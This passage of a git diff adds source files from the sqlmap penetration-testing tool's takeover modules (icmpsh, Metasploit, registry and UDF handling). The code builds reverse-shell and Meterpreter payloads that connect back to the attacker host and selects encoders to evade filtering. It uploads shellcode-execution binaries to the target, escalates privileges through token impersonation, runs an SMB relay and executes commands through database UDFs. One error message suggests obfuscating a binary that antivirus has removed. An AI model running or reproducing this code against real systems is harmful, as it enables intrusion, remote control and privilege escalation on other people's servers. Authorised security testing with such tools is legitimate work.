_initVars(self): + self.lhostStr = None + self.rhostStr = None + self.localIP = getLocalIP() + self.remoteIP = getRemoteIP() or conf.hostname + self._icmpslave = normalizePath(os.path.join(paths.SQLMAP_EXTRAS_PATH, "icmpsh", "icmpsh.exe_")) + + def _selectRhost(self): + address = None + message = "what is the back-end DBMS address? " + + if self.remoteIP: + message += "[Enter for '%s' (detected)] " % self.remoteIP + + while not address: + address = readInput(message, default=self.remoteIP) + + if conf.batch and not address: + raise SqlmapDataException("remote host address is missing") + + return address + + def _selectLhost(self): + address = None + message = "what is the local address? " + + if self.localIP: + message += "[Enter for '%s' (detected)] " % self.localIP + + valid = None + while not valid: + valid = True + address = readInput(message, default=self.localIP or "") + + try: + socket.inet_aton(address) + except socket.error: + valid = False + finally: + valid = valid and re.search(r"\d+\.\d+\.\d+\.\d+", address) is not None + + if conf.batch and not address: + raise SqlmapDataException("local host address is missing") + elif address and not valid: + warnMsg = "invalid local host address" + logger.warning(warnMsg) + + return address + + def _prepareIngredients(self, encode=True): + self.localIP = getattr(self, "localIP", None) + self.remoteIP = getattr(self, "remoteIP", None) + self.lhostStr = ICMPsh._selectLhost(self) + self.rhostStr = ICMPsh._selectRhost(self) + + def _runIcmpshMaster(self): + infoMsg = "running icmpsh master locally" + logger.info(infoMsg) + + icmpshmaster(self.lhostStr, self.rhostStr) + + def _runIcmpshSlaveRemote(self): + infoMsg = "running icmpsh slave remotely" + logger.info(infoMsg) + + cmd = "%s -t %s -d 500 -b 30 -s 128 &" % (self._icmpslaveRemote, self.lhostStr) + + self.execCmd(cmd, silent=True) + + def uploadIcmpshSlave(self, web=False): + ICMPsh._initVars(self) + self._randStr = randomStr(lowercase=True) + self._icmpslaveRemoteBase = "tmpi%s.exe" % self._randStr + + self._icmpslaveRemote = "%s/%s" % (conf.tmpPath, self._icmpslaveRemoteBase) + self._icmpslaveRemote = ntToPosixSlashes(normalizePath(self._icmpslaveRemote)) + + logger.info("uploading icmpsh slave to '%s'" % self._icmpslaveRemote) + + if web: + written = self.webUpload(self._icmpslaveRemote, os.path.split(self._icmpslaveRemote)[0], filepath=self._icmpslave) + else: + written = self.writeFile(self._icmpslave, self._icmpslaveRemote, "binary", forceCheck=True) + + if written is not True: + errMsg = "there has been a problem uploading icmpsh, it " + errMsg += "looks like the binary file has not been written " + errMsg += "on the database underlying file system or an AV has " + errMsg += "flagged it as malicious and removed it. In such a case " + errMsg += "it is recommended to recompile icmpsh with slight " + errMsg += "modification to the source code or pack it with an " + errMsg += "obfuscator software" + logger.error(errMsg) + + return False + else: + logger.info("icmpsh successfully uploaded") + return True + + def icmpPwn(self): + ICMPsh._prepareIngredients(self) + self._runIcmpshSlaveRemote() + self._runIcmpshMaster() + + debugMsg = "icmpsh master exited" + logger.debug(debugMsg) + + time.sleep(1) + self.execCmd("taskkill /F /IM %s" % self._icmpslaveRemoteBase, silent=True) + time.sleep(1) + self.delRemoteFile(self._icmpslaveRemote) diff --git a/src/sqlmap-master/lib/takeover/metasploit.py b/src/sqlmap-master/lib/takeover/metasploit.py new file mode 100644 index 0000000..f302802 --- /dev/null +++ b/src/sqlmap-master/lib/takeover/metasploit.py @@ -0,0 +1,705 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) +See the file 'LICENSE' for copying permission +""" + +from __future__ import print_function + +import errno +import os +import re +import select +import sys +import tempfile +import time + +from subprocess import PIPE + +from extra.cloak.cloak import cloak +from extra.cloak.cloak import decloak +from lib.core.common import dataToStdout +from lib.core.common import Backend +from lib.core.common import getLocalIP +from lib.core.common import getRemoteIP +from lib.core.common import isDigit +from lib.core.common import normalizePath +from lib.core.common import ntToPosixSlashes +from lib.core.common import pollProcess +from lib.core.common import randomRange +from lib.core.common import randomStr +from lib.core.common import readInput +from lib.core.convert import getBytes +from lib.core.convert import getText +from lib.core.data import conf +from lib.core.data import kb +from lib.core.data import logger +from lib.core.data import paths +from lib.core.enums import DBMS +from lib.core.enums import OS +from lib.core.exception import SqlmapDataException +from lib.core.exception import SqlmapFilePathException +from lib.core.exception import SqlmapGenericException +from lib.core.settings import IS_WIN +from lib.core.settings import METASPLOIT_SESSION_TIMEOUT +from lib.core.settings import SHELLCODEEXEC_RANDOM_STRING_MARKER +from lib.core.subprocessng import blockingReadFromFD +from lib.core.subprocessng import blockingWriteToFD +from lib.core.subprocessng import Popen as execute +from lib.core.subprocessng import send_all +from lib.core.subprocessng import recv_some +from thirdparty import six + +if IS_WIN: + import msvcrt + +class Metasploit(object): + """ + This class defines methods to call Metasploit for plugins. + """ + + def _initVars(self): + self.connectionStr = None + self.lhostStr = None + self.rhostStr = None + self.portStr = None + self.payloadStr = None + self.encoderStr = None + self.payloadConnStr = None + self.localIP = getLocalIP() + self.remoteIP = getRemoteIP() or conf.hostname + self._msfCli = normalizePath(os.path.join(conf.msfPath, "msfcli%s" % (".bat" if IS_WIN else ""))) + self._msfConsole = normalizePath(os.path.join(conf.msfPath, "msfconsole%s" % (".bat" if IS_WIN else ""))) + self._msfEncode = normalizePath(os.path.join(conf.msfPath, "msfencode%s" % (".bat" if IS_WIN else ""))) + self._msfPayload = normalizePath(os.path.join(conf.msfPath, "msfpayload%s" % (".bat" if IS_WIN else ""))) + self._msfVenom = normalizePath(os.path.join(conf.msfPath, "msfvenom%s" % (".bat" if IS_WIN else ""))) + + self._msfPayloadsList = { + "windows": { + 1: ("Meterpreter (default)", "windows/meterpreter"), + 2: ("Shell", "windows/shell"), + 3: ("VNC", "windows/vncinject"), + }, + "linux": { + 1: ("Shell (default)", "linux/x86/shell"), + 2: ("Meterpreter (beta)", "linux/x86/meterpreter"), + } + } + + self._msfConnectionsList = { + "windows": { + 1: ("Reverse TCP: Connect back from the database host to this machine (default)", "reverse_tcp"), + 2: ("Reverse TCP: Try to connect back from the database host to this machine, on all ports between the specified and 65535", "reverse_tcp_allports"), + 3: ("Reverse HTTP: Connect back from the database host to this machine tunnelling traffic over HTTP", "reverse_http"), + 4: ("Reverse HTTPS: Connect back from the database host to this machine tunnelling traffic over HTTPS", "reverse_https"), + 5: ("Bind TCP: Listen on the database host for a connection", "bind_tcp"), + }, + "linux": { + 1: ("Reverse TCP: Connect back from the database host to this machine (default)", "reverse_tcp"), + 2: ("Bind TCP: Listen on the database host for a connection", "bind_tcp"), + } + } + + self._msfEncodersList = { + "windows": { + 1: ("No Encoder", "generic/none"), + 2: ("Alpha2 Alphanumeric Mixedcase Encoder", "x86/alpha_mixed"), + 3: ("Alpha2 Alphanumeric Uppercase Encoder", "x86/alpha_upper"), + 4: ("Avoid UTF8/tolower", "x86/avoid_utf8_tolower"), + 5: ("Call+4 Dword XOR Encoder", "x86/call4_dword_xor"), + 6: ("Single-byte XOR Countdown Encoder", "x86/countdown"), + 7: ("Variable-length Fnstenv/mov Dword XOR Encoder", "x86/fnstenv_mov"), + 8: ("Polymorphic Jump/Call XOR Additive Feedback Encoder", "x86/jmp_call_additive"), + 9: ("Non-Alpha Encoder", "x86/nonalpha"), + 10: ("Non-Upper Encoder", "x86/nonupper"), + 11: ("Polymorphic XOR Additive Feedback Encoder (default)", "x86/shikata_ga_nai"), + 12: ("Alpha2 Alphanumeric Unicode Mixedcase Encoder", "x86/unicode_mixed"), + 13: ("Alpha2 Alphanumeric Unicode Uppercase Encoder", "x86/unicode_upper"), + } + } + + self._msfSMBPortsList = { + "windows": { + 1: ("139/TCP", "139"), + 2: ("445/TCP (default)", "445"), + } + } + + self._portData = { + "bind": "remote port number", + "reverse": "local port number", + } + + def _skeletonSelection(self, msg, lst=None, maxValue=1, default=1): + if Backend.isOs(OS.WINDOWS): + opSys = "windows" + else: + opSys = "linux" + + message = "which %s do you want to use?" % msg + + if lst: + for num, data in lst[opSys].items(): + description = data[0] + + if num > maxValue: + maxValue = num + + if "(default)" in description: + default = num + + message += "\n[%d] %s" % (num, description) + else: + message += " [%d] " % default + + choice = readInput(message, default="%d" % default) + + if not choice or not isDigit(choice) or int(choice) > maxValue or int(choice) < 1: + choice = default + + choice = int(choice) + + if lst: + choice = lst[opSys][choice][1] + + return choice + + def _selectSMBPort(self): + return self._skeletonSelection("SMB port", self._msfSMBPortsList) + + def _selectEncoder(self, encode=True): + # This is always the case except for --os-bof where the user can + # choose which encoder to use. When called from --os-pwn the encoder + # is always x86/alpha_mixed - used for sys_bineval() and + # shellcodeexec + if isinstance(encode, six.string_types): + return encode + + elif encode: + return self._skeletonSelection("payload encoding", self._msfEncodersList) + + def _selectPayload(self): + if Backend.isOs(OS.WINDOWS) and conf.privEsc: + infoMsg = "forcing Metasploit payload to Meterpreter because " + infoMsg += "it is the only payload that can be used to " + infoMsg += "escalate privileges via 'incognito' extension, " + infoMsg += "'getsystem' command or post modules" + logger.info(infoMsg) + + _payloadStr = "windows/meterpreter" + else: + _payloadStr = self._skeletonSelection("payload", self._msfPayloadsList) + + if _payloadStr == "windows/vncinject": + choose = False + + if Backend.isDbms(DBMS.MYSQL): + debugMsg = "by default MySQL on Windows runs as SYSTEM " + debugMsg += "user, it is likely that the VNC " + debugMsg += "injection will be successful" + logger.debug(debugMsg) + + elif Backend.isDbms(DBMS.PGSQL): + choose = True + + warnMsg = "by default PostgreSQL on Windows runs as " + warnMsg += "postgres user, it is unlikely that the VNC " + warnMsg += "injection will be successful" + logger.warning(warnMsg) + + elif Backend.isDbms(DBMS.MSSQL) and Backend.isVersionWithin(("2005", "2008")): + choose = True + + warnMsg = "it is unlikely that the VNC injection will be " + warnMsg += "successful because usually Microsoft SQL Server " + warnMsg += "%s runs as Network Service " % Backend.getVersion() + warnMsg += "or the Administrator is not logged in" + logger.warning(warnMsg) + + if choose: + message = "what do you want to do?\n" + message += "[1] Give it a try anyway\n" + message += "[2] Fall back to Meterpreter payload (default)\n" + message += "[3] Fall back to Shell payload" + + while True: + choice = readInput(message, default="2") + + if not choice or choice == "2": + _payloadStr = "windows/meterpreter" + break + + elif choice == "3": + _payloadStr = "windows/shell" + break + + elif choice == "1": + if Backend.isDbms(DBMS.PGSQL): + logger.warning("beware that the VNC injection might not work") + break + + elif Backend.isDbms(DBMS.MSSQL) and Backend.isVersionWithin(("2005", "2008")): + break + + elif not isDigit(choice): + logger.warning("invalid value, only digits are allowed") + + elif int(choice) < 1 or int(choice) > 2: + logger.warning("invalid value, it must be 1 or 2") + + if self.connectionStr.startswith("reverse_http") and _payloadStr != "windows/meterpreter": + warnMsg = "Reverse HTTP%s connection is only supported " % ("S" if self.connectionStr.endswith("s") else "") + warnMsg += "with the Meterpreter payload. Falling back to " + warnMsg += "reverse TCP" + logger.warning(warnMsg) + + self.connectionStr = "reverse_tcp" + + return _payloadStr + + def _selectPort(self): + for connType, connStr in self._portData.items(): + if self.connectionStr.startswith(connType): + return self._skeletonSelection(connStr, maxValue=65535, default=randomRange(1025, 65535)) + + def _selectRhost(self): + if self.connectionStr.startswith("bind"): + message = "what is the back-end DBMS address? [Enter for '%s' (detected)] " % self.remoteIP + address = readInput(message, default=self.remoteIP) + + if not address: + address = self.remoteIP + + return address + + elif self.connectionStr.startswith("reverse"): + return None + + else: + raise SqlmapDataException("unexpected connection type") + + def _selectLhost(self): + if self.connectionStr.startswith("reverse"): + message = "what is the local address? [Enter for '%s' (detected)] " % self.localIP + address = readInput(message, default=self.localIP) + + if not address: + address = self.localIP + + return address + + elif self.connectionStr.startswith("bind"): + return None + + else: + raise SqlmapDataException("unexpected connection type") + + def _selectConnection(self): + return self._skeletonSelection("connection type", self._msfConnectionsList) + + def _prepareIngredients(self, encode=True): + self.connectionStr = self._selectConnection() + self.lhostStr = self._selectLhost() + self.rhostStr = self._selectRhost() + self.portStr = self._selectPort() + self.payloadStr = self._selectPayload() + self.encoderStr = self._selectEncoder(encode) + self.payloadConnStr = "%s/%s" % (self.payloadStr, self.connectionStr) + + def _forgeMsfCliCmd(self, exitfunc="process"): + if kb.oldMsf: + self._cliCmd = "%s multi/handler PAYLOAD=%s" % (self._msfCli, self.payloadConnStr) + self._cliCmd += " EXITFUNC=%s" % exitfunc + self._cliCmd += " LPORT=%s" % self.portStr + + if self.connectionStr.startswith("bind"): + self._cliCmd += " RHOST=%s" % self.rhostStr + elif self.connectionStr.startswith("reverse"): + self._cliCmd += " LHOST=%s" % self.lhostStr + else: + raise SqlmapDataException("unexpected connection type") + + if Backend.isOs(OS.WINDOWS) and self.payloadStr == "windows/vncinject": + self._cliCmd += " DisableCourtesyShell=true" + + self._cliCmd += " E" + else: + self._cliCmd = "%s -L -x 'use multi/handler; set PAYLOAD %s" % (self._msfConsole, self.payloadConnStr) + self._cliCmd += "; set EXITFUNC %s" % exitfunc + self._cliCmd += "; set LPORT %s" % self.portStr + + if self.connectionStr.startswith("bind"): + self._cliCmd += "; set RHOST %s" % self.rhostStr + elif self.connectionStr.startswith("reverse"): + self._cliCmd += "; set LHOST %s" % self.lhostStr + else: + raise SqlmapDataException("unexpected connection type") + + if Backend.isOs(OS.WINDOWS) and self.payloadStr == "windows/vncinject": + self._cliCmd += "; set DisableCourtesyShell true" + + self._cliCmd += "; exploit'" + + def _forgeMsfCliCmdForSmbrelay(self): + self._prepareIngredients(encode=False) + + if kb.oldMsf: + self._cliCmd = "%s windows/smb/smb_relay PAYLOAD=%s" % (self._msfCli, self.payloadConnStr) + self._cliCmd += " EXITFUNC=thread" + self._cliCmd += " LPORT=%s" % self.portStr + self._cliCmd += " SRVHOST=%s" % self.lhostStr + self._cliCmd += " SRVPORT=%s" % self._selectSMBPort() + + if self.connectionStr.startswith("bind"): + self._cliCmd += " RHOST=%s" % self.rhostStr + elif self.connectionStr.startswith("reverse"): + self._cliCmd += " LHOST=%s" % self.lhostStr + else: + raise SqlmapDataException("unexpected connection type") + + self._cliCmd += " E" + else: + self._cliCmd = "%s -x 'use windows/smb/smb_relay; set PAYLOAD %s" % (self._msfConsole, self.payloadConnStr) + self._cliCmd += "; set EXITFUNC thread" + self._cliCmd += "; set LPORT %s" % self.portStr + self._cliCmd += "; set SRVHOST %s" % self.lhostStr + self._cliCmd += "; set SRVPORT %s" % self._selectSMBPort() + + if self.connectionStr.startswith("bind"): + self._cliCmd += "; set RHOST %s" % self.rhostStr + elif self.connectionStr.startswith("reverse"): + self._cliCmd += "; set LHOST %s" % self.lhostStr + else: + raise SqlmapDataException("unexpected connection type") + + self._cliCmd += "; exploit'" + + def _forgeMsfPayloadCmd(self, exitfunc, format, outFile, extra=None): + if kb.oldMsf: + self._payloadCmd = self._msfPayload + else: + self._payloadCmd = "%s -p" % self._msfVenom + + self._payloadCmd += " %s" % self.payloadConnStr + self._payloadCmd += " EXITFUNC=%s" % exitfunc + self._payloadCmd += " LPORT=%s" % self.portStr + + if self.connectionStr.startswith("reverse"): + self._payloadCmd += " LHOST=%s" % self.lhostStr + elif not self.connectionStr.startswith("bind"): + raise SqlmapDataException("unexpected connection type") + + if Backend.isOs(OS.LINUX) and conf.privEsc: + self._payloadCmd += " PrependChrootBreak=true PrependSetuid=true" + + if kb.oldMsf: + if extra == "BufferRegister=EAX": + self._payloadCmd += " R | %s -a x86 -e %s -o \"%s\" -t %s" % (self._msfEncode, self.encoderStr, outFile, format) + + if extra is not None: + self._payloadCmd += " %s" % extra + else: + self._payloadCmd += " X > \"%s\"" % outFile + else: + if extra == "BufferRegister=EAX": + self._payloadCmd += " -a x86 -e %s -f %s" % (self.encoderStr, format) + + if extra is not None: + self._payloadCmd += " %s" % extra + + self._payloadCmd += " > \"%s\"" % outFile + else: + self._payloadCmd += " -f exe > \"%s\"" % outFile + + def _runMsfCliSmbrelay(self): + self._forgeMsfCliCmdForSmbrelay() + + infoMsg = "running Metasploit Framework command line " + infoMsg += "interface locally, please wait.." + logger.info(infoMsg) + + logger.debug("executing local command: %s" % self._cliCmd) + self._msfCliProc = execute(self._cliCmd, shell=True, stdin=PIPE, stdout=PIPE, stderr=PIPE, close_fds=False) + + def _runMsfCli(self, exitfunc): + self._forgeMsfCliCmd(exitfunc) + + infoMsg = "running Metasploit Framework command line " + infoMsg += "interface locally, please wait.." + logger.info(infoMsg) + + logger.debug("executing local command: %s" % self._cliCmd) + self._msfCliProc = execute(self._cliCmd, shell=True, stdin=PIPE, stdout=PIPE, stderr=PIPE, close_fds=False) + + def _runMsfShellcodeRemote(self): + infoMsg = "running Metasploit Framework shellcode " + infoMsg += "remotely via UDF 'sys_bineval', please wait.." + logger.info(infoMsg) + + self.udfExecCmd("'%s'" % self.shellcodeString, silent=True, udfName="sys_bineval") + + def _runMsfShellcodeRemoteViaSexec(self): + infoMsg = "running Metasploit Framework shellcode remotely " + infoMsg += "via shellcodeexec, please wait.." + logger.info(infoMsg) + + if not Backend.isOs(OS.WINDOWS): + self.execCmd("chmod +x %s" % self.shellcodeexecRemote, silent=True) + cmd = "%s %s &" % (self.shellcodeexecRemote, self.shellcodeString) + else: + cmd = "\"%s\" %s" % (self.shellcodeexecRemote, self.shellcodeString) + + self.execCmd(cmd, silent=True) + + def _loadMetExtensions(self, proc, metSess): + if not Backend.isOs(OS.WINDOWS): + return + + send_all(proc, "use espia\n") + send_all(proc, "use incognito\n") + + # This extension is loaded by default since Metasploit > 3.7: + # send_all(proc, "use priv\n") + + # This extension freezes the connection on 64-bit systems: + # send_all(proc, "use sniffer\n") + + send_all(proc, "sysinfo\n") + send_all(proc, "getuid\n") + + if conf.privEsc: + print() + + infoMsg = "trying to escalate privileges using Meterpreter " + infoMsg += "'getsystem' command which tries different " + infoMsg += "techniques, including kitrap0d" + logger.info(infoMsg) + + send_all(proc, "getsystem\n") + + infoMsg = "displaying the list of available Access Tokens. " + infoMsg += "Choose which user you want to impersonate by " + infoMsg += "using incognito's command 'impersonate_token' if " + infoMsg += "'getsystem' does not success to elevate privileges" + logger.info(infoMsg) + + send_all(proc, "list_tokens -u\n") + send_all(proc, "getuid\n") + + def _controlMsfCmd(self, proc, func): + initialized = False + start_time = time.time() + stdin_fd = sys.stdin.fileno() + + while True: + returncode = proc.poll() + + if returncode is None: + # Child hasn't exited yet + pass + else: + logger.debug("connection closed properly") + return returncode + + try: + if IS_WIN: + timeout = 3 + + inp = b"" + _ = time.time() + + while True: + if msvcrt.kbhit(): + char = msvcrt.getche() + + if ord(char) == 13: # enter_key + break + elif ord(char) >= 32: # space_char + inp += char + + if len(inp) == 0 and (time.time() - _) > timeout: + break + + if len(inp) > 0: + try: + send_all(proc, inp) + except (EOFError, IOError): + # Probably the child has exited + pass + else: + ready_fds = select.select([stdin_fd], [], [], 1) + + if stdin_fd in ready_fds[0]: + try: + send_all(proc, blockingReadFromFD(stdin_fd)) + except (EOFError, IOError): + # Probably the child has exited + pass + + out = recv_some(proc, t=.1, e=0) + blockingWriteToFD(sys.stdout.fileno(), getBytes(out)) + + # For --os-pwn and --os-bof + pwnBofCond = self.connectionStr.startswith("reverse") + pwnBofCond &= any(_ in out for _ in (b"Starting the payload handler", b"Started reverse")) + + # For --os-smbrelay + smbRelayCond = b"Server started" in out + + if pwnBofCond or smbRelayCond: + func() + + timeout = time.time() - start_time > METASPLOIT_SESSION_TIMEOUT + + if not initialized: + match = re.search(b"Meterpreter session ([\\d]+) opened", out) + + if match: + self._loadMetExtensions(proc, match.group(1)) + + if "shell" in self.payloadStr: + send_all(proc, "whoami\n" if Backend.isOs(OS.WINDOWS) else "uname -a ; id\n") + time.sleep(2) + + initialized = True + elif timeout: + proc.kill() + errMsg = "timeout occurred while attempting " + errMsg += "to open a remote session" + raise SqlmapGenericException(errMsg) + + except select.error as ex: + # Reference: https://github.com/andymccurdy/redis-py/pull/743/commits/2b59b25bb08ea09e98aede1b1f23a270fc085a9f + if ex.args[0] == errno.EINTR: + continue + else: + return proc.returncode + except (EOFError, IOError): + return proc.returncode + except KeyboardInterrupt: + pass + + def createMsfShellcode(self, exitfunc, format, extra, encode): + infoMsg = "creating Metasploit Framework multi-stage shellcode " + logger.info(infoMsg) + + self._randStr = randomStr(lowercase=True) + self._shellcodeFilePath = os.path.join(conf.outputPath, "tmpm%s" % self._randStr) + + Metasploit._initVars(self) + self._prepareIngredients(encode=encode) + self._forgeMsfPayloadCmd(exitfunc, format, self._shellcodeFilePath, extra) + + logger.debug("executing local command: %s" % self._payloadCmd) + process = execute(self._payloadCmd, shell=True, stdin=PIPE, stdout=PIPE, stderr=PIPE, close_fds=False) + + dataToStdout("\r[%s] [INFO] creation in progress " % time.strftime("%X")) + pollProcess(process) + payloadStderr = process.communicate()[1] + + match = re.search(b"(Total size:|Length:|succeeded with size|Final size of exe file:) ([\\d]+)", payloadStderr) + + if match: + payloadSize = int(match.group(2)) + + if extra == "BufferRegister=EAX": + payloadSize = payloadSize // 2 + + debugMsg = "the shellcode size is %d bytes" % payloadSize + logger.debug(debugMsg) + else: + errMsg = "failed to create the shellcode ('%s')" % getText(payloadStderr).replace("\n", " ").replace("\r", "") + raise SqlmapFilePathException(errMsg) + + self._shellcodeFP = open(self._shellcodeFilePath, "rb") + self.shellcodeString = getText(self._shellcodeFP.read()) + self._shellcodeFP.close() + + os.unlink(self._shellcodeFilePath) + + def uploadShellcodeexec(self, web=False): + self.shellcodeexecLocal = os.path.join(paths.SQLMAP_EXTRAS_PATH, "shellcodeexec") + + if Backend.isOs(OS.WINDOWS): + self.shellcodeexecLocal = os.path.join(self.shellcodeexecLocal, "windows", "shellcodeexec.x%s.exe_" % "32") + content = decloak(self.shellcodeexecLocal) + if SHELLCODEEXEC_RANDOM_STRING_MARKER in content: + content = content.replace(SHELLCODEEXEC_RANDOM_STRING_MARKER, getBytes(randomStr(len(SHELLCODEEXEC_RANDOM_STRING_MARKER)))) + _ = cloak(data=content) + handle, self.shellcodeexecLocal = tempfile.mkstemp(suffix="%s.exe_" % "32") + os.close(handle) + with open(self.shellcodeexecLocal, "w+b") as f: + f.write(_) + else: + self.shellcodeexecLocal = os.path.join(self.shellcodeexecLocal, "linux", "shellcodeexec.x%s_" % Backend.getArch()) + + __basename = "tmpse%s%s" % (self._randStr, ".exe" if Backend.isOs(OS.WINDOWS) else "") + + self.shellcodeexecRemote = "%s/%s" % (conf.tmpPath, __basename) + self.shellcodeexecRemote = ntToPosixSlashes(normalizePath(self.shellcodeexecRemote)) + + logger.info("uploading shellcodeexec to '%s'" % self.shellcodeexecRemote) + + if web: + written = self.webUpload(self.shellcodeexecRemote, os.path.split(self.shellcodeexecRemote)[0], filepath=self.shellcodeexecLocal) + else: + written = self.writeFile(self.shellcodeexecLocal, self.shellcodeexecRemote, "binary", forceCheck=True) + + if written is not True: + errMsg = "there has been a problem uploading shellcodeexec. It " + errMsg += "looks like the binary file has not been written " + errMsg += "on the database underlying file system or an AV has " + errMsg += "flagged it as malicious and removed it" + logger.error(errMsg) + + return False + else: + logger.info("shellcodeexec successfully uploaded") + return True + + def pwn(self, goUdf=False): + if goUdf: + exitfunc = "thread" + func = self._runMsfShellcodeRemote + else: + exitfunc = "process" + func = self._runMsfShellcodeRemoteViaSexec + + self._runMsfCli(exitfunc=exitfunc) + + if self.connectionStr.startswith("bind"): + func() + + debugMsg = "Metasploit Framework command line interface exited " + debugMsg += "with return code %s" % self._controlMsfCmd(self._msfCliProc, func) + logger.debug(debugMsg) + + if not goUdf: + time.sleep(1) + self.delRemoteFile(self.shellcodeexecRemote) + + def smb(self): + Metasploit._initVars(self) + self._randFile = "tmpu%s.txt" % randomStr(lowercase=True) + + self._runMsfCliSmbrelay() + + if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL): + self.uncPath = r"\\\\%s\\%s" % (self.lhostStr, self._randFile) + else: + self.uncPath = r"\\%s\%s" % (self.lhostStr, self._randFile) + + debugMsg = "Metasploit Framework console exited with return " + debugMsg += "code %s" % self._controlMsfCmd(self._msfCliProc, self.uncPathRequest) + logger.debug(debugMsg) + + def bof(self): + self._runMsfCli(exitfunc="seh") + + if self.connectionStr.startswith("bind"): + self.spHeapOverflow() + + debugMsg = "Metasploit Framework command line interface exited " + debugMsg += "with return code %s" % self._controlMsfCmd(self._msfCliProc, self.spHeapOverflow) + logger.debug(debugMsg) diff --git a/src/sqlmap-master/lib/takeover/registry.py b/src/sqlmap-master/lib/takeover/registry.py new file mode 100644 index 0000000..650ce10 --- /dev/null +++ b/src/sqlmap-master/lib/takeover/registry.py @@ -0,0 +1,118 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) +See the file 'LICENSE' for copying permission +""" + +import os + +from lib.core.common import openFile +from lib.core.common import randomStr +from lib.core.data import conf +from lib.core.data import logger +from lib.core.enums import REGISTRY_OPERATION + +class Registry(object): + """ + This class defines methods to read and write Windows registry keys + """ + + def _initVars(self, regKey, regValue, regType=None, regData=None, parse=False): + self._regKey = regKey + self._regValue = regValue + self._regType = regType + self._regData = regData + + self._randStr = randomStr(lowercase=True) + self._batPathRemote = "%s/tmpr%s.bat" % (conf.tmpPath, self._randStr) + self._batPathLocal = os.path.join(conf.outputPath, "tmpr%s.bat" % self._randStr) + + if parse: + readParse = "FOR /F \"tokens=*\" %%A IN ('REG QUERY \"" + self._regKey + "\" /v \"" + self._regValue + "\"') DO SET value=%%A\r\nECHO %value%\r\n" + else: + readParse = "REG QUERY \"" + self._regKey + "\" /v \"" + self._regValue + "\"" + + self._batRead = ( + "@ECHO OFF\r\n", + readParse, + ) + + self._batAdd = ( + "@ECHO OFF\r\n", + "REG ADD \"%s\" /v \"%s\" /t %s /d %s /f" % (self._regKey, self._regValue, self._regType, self._regData), + ) + + self._batDel = ( + "@ECHO OFF\r\n", + "REG DELETE \"%s\" /v \"%s\" /f" % (self._regKey, self._regValue), + ) + + def _createLocalBatchFile(self): + self._batPathFp = openFile(self._batPathLocal, "w") + + if self._operation == REGISTRY_OPERATION.READ: + lines = self._batRead + elif self._operation == REGISTRY_OPERATION.ADD: + lines = self._batAdd + elif self._operation == REGISTRY_OPERATION.DELETE: + lines = self._batDel + + for line in lines: + self._batPathFp.write(line) + + self._batPathFp.close() + + def _createRemoteBatchFile(self): + logger.debug("creating batch file '%s'" % self._batPathRemote) + + self._createLocalBatchFile() + self.writeFile(self._batPathLocal, self._batPathRemote, "text", forceCheck=True) + + os.unlink(self._batPathLocal) + + def readRegKey(self, regKey, regValue, parse=False): + self._operation = REGISTRY_OPERATION.READ + + Registry._initVars(self, regKey, regValue, parse=parse) + self._createRemoteBatchFile() + + logger.debug("reading registry key '%s' value '%s'" % (regKey, regValue)) + + data = self.evalCmd(self._batPathRemote) + + if data and not parse: + pattern = ' ' + index = data.find(pattern) + if index != -1: + data = data[index + len(pattern):] + + self.delRemoteFile(self._batPathRemote) + + return data + + def addRegKey(self, regKey, regValue, regType, regData): + self._operation = REGISTRY_OPERATION.ADD + + Registry._initVars(self, regKey, regValue, regType, regData) + self._createRemoteBatchFile() + + debugMsg = "adding registry key value '%s' " % self._regValue + debugMsg += "to registry key '%s'" % self._regKey + logger.debug(debugMsg) + + self.execCmd(cmd=self._batPathRemote) + self.delRemoteFile(self._batPathRemote) + + def delRegKey(self, regKey, regValue): + self._operation = REGISTRY_OPERATION.DELETE + + Registry._initVars(self, regKey, regValue) + self._createRemoteBatchFile() + + debugMsg = "deleting registry key value '%s' " % self._regValue + debugMsg += "from registry key '%s'" % self._regKey + logger.debug(debugMsg) + + self.execCmd(cmd=self._batPathRemote) + self.delRemoteFile(self._batPathRemote) diff --git a/src/sqlmap-master/lib/takeover/udf.py b/src/sqlmap-master/lib/takeover/udf.py new file mode 100644 index 0000000..40da398 --- /dev/null +++ b/src/sqlmap-master/lib/takeover/udf.py @@ -0,0 +1,396 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) +See the file 'LICENSE' for copying permission +""" + +import os + +from lib.core.agent import agent +from lib.core.common import Backend +from lib.core.common import checkFile +from lib.core.common import dataToStdout +from lib.core.common import isDigit +from lib.core.common import isStackingAvailable +from lib.core.common import readInput +from lib.core.common import unArrayizeValue +from lib.core.compat import xrange +from lib.core.data import conf +from lib.core.data import logger +from lib.core.data import queries +from lib.core.enums import CHARSET_TYPE +from lib.core.enums import DBMS +from lib.core.enums import EXPECTED +from lib.core.enums import OS +from lib.core.exception import SqlmapFilePathException +from lib.core.exception import SqlmapMissingMandatoryOptionException +from lib.core.exception import SqlmapUnsupportedFeatureException +from lib.core.exception import SqlmapUserQuitException +from lib.core.unescaper import unescaper +from lib.request import inject + +class UDF(object): + """ + This class defines methods to deal with User-Defined Functions for + plugins. + """ + + def __init__(self): + self.createdUdf = set() + self.udfs = {} + self.udfToCreate = set() + + def _askOverwriteUdf(self, udf): + message = "UDF '%s' already exists, do you " % udf + message += "want to overwrite it? [y/N] " + + return readInput(message, default='N', boolean=True) + + def _checkExistUdf(self, udf): + logger.info("checking if UDF '%s' already exist" % udf) + + query = agent.forgeCaseStatement(queries[Backend.getIdentifiedDbms()].check_udf.query % (udf, udf)) + return inject.getValue(query, resumeValue=False, expected=EXPECTED.BOOL, charsetType=CHARSET_TYPE.BINARY) + + def udfCheckAndOverwrite(self, udf): + exists = self._checkExistUdf(udf) + overwrite = True + + if exists: + overwrite = self._askOverwriteUdf(udf) + + if overwrite: + self.udfToCreate.add(udf) + + def udfCreateSupportTbl(self, dataType): + debugMsg = "creating a support table for user-defined functions" + logger.debug(debugMsg) + + self.createSupportTbl(self.cmdTblName, self.tblField, dataType) + + def udfForgeCmd(self, cmd): + if not cmd.startswith("'"): + cmd = "'%s" % cmd + + if not cmd.endswith("'"): + cmd = "%s'" % cmd + + return cmd + + def udfExecCmd(self, cmd, silent=False, udfName=None): + if udfName is None: + udfName = "sys_exec" + + cmd = unescaper.escape(self.udfForgeCmd(cmd)) + + return inject.goStacked("SELECT %s(%s)" % (udfName, cmd), silent) + 